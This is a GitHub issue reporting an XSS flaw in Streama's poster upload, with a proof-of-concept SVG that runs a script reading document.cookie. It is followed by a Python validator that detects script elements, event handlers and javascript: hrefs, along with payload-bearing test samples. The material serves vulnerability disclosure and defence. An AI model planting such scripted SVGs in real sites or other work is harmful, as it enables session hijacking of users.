streamaserver/streama

XSS in the Upload Poster feature using an SVG image

Open

#1,088 opened on Sep 13, 2021

Labels: Bug, Help wanted


Description

If uploading an SVG file in the poster file browser containing a script tag, this script tag will be executed when opening the file. Example file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>
alert(document.cookie);
</script>
</svg>
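An added server-side acceptance check for the poster upload described in this report (example code, not Streama's own): it assumes the uploaded bytes are available as `data` and rejects any SVG that carries a script or foreignObject element, an event-handler attribute, or an href using a script scheme, while still accepting plain vector images.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that execute or embed arbitrary content when the SVG is rendered.
FORBIDDEN_ELEMENTS = {"script", "foreignobject"}
# URL schemes in href/xlink:href that run script instead of loading a resource.
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def check_svg(data: bytes) -> list:
    """Return the reasons an uploaded SVG must be rejected; an empty list means it passed."""
    problems = []
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD from the DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        problems.append(f"root element is {root.tag!r}, not an SVG document")
    for elem in root.iter():
        name = _local_name(elem.tag).lower()
        if name in FORBIDDEN_ELEMENTS:
            problems.append(f"forbidden element <{name}>")
        for attr, value in elem.attrib.items():
            attr_local = _local_name(attr).lower()
            if attr_local.startswith("on"):  # onload, onclick, onmouseover, ...
                problems.append(f"event handler attribute {attr_local}= on <{name}>")
            elif attr_local == "href" and value.strip().lower().startswith(SCRIPT_SCHEMES):
                problems.append(f"script URL in {attr_local} on <{name}>")
    return problems


def svg_is_safe(data: bytes) -> bool:
    """Convenience wrapper: True only when check_svg() finds nothing to reject."""
    return not check_svg(data)


# Constructed samples (assumed inputs): the first mirrors the report's proof of concept.
SCRIPT_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>alert(document.cookie);</script>
</svg>"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="javascript:alert(1)"><rect width="10" height="10" onload="alert(1)"/></a>
</svg>"""
PLAIN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>"""
```

Rejecting scripted SVGs at upload time complements, rather than replaces, serving user uploads from a separate origin or with a restrictive Content-Security-Policy.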
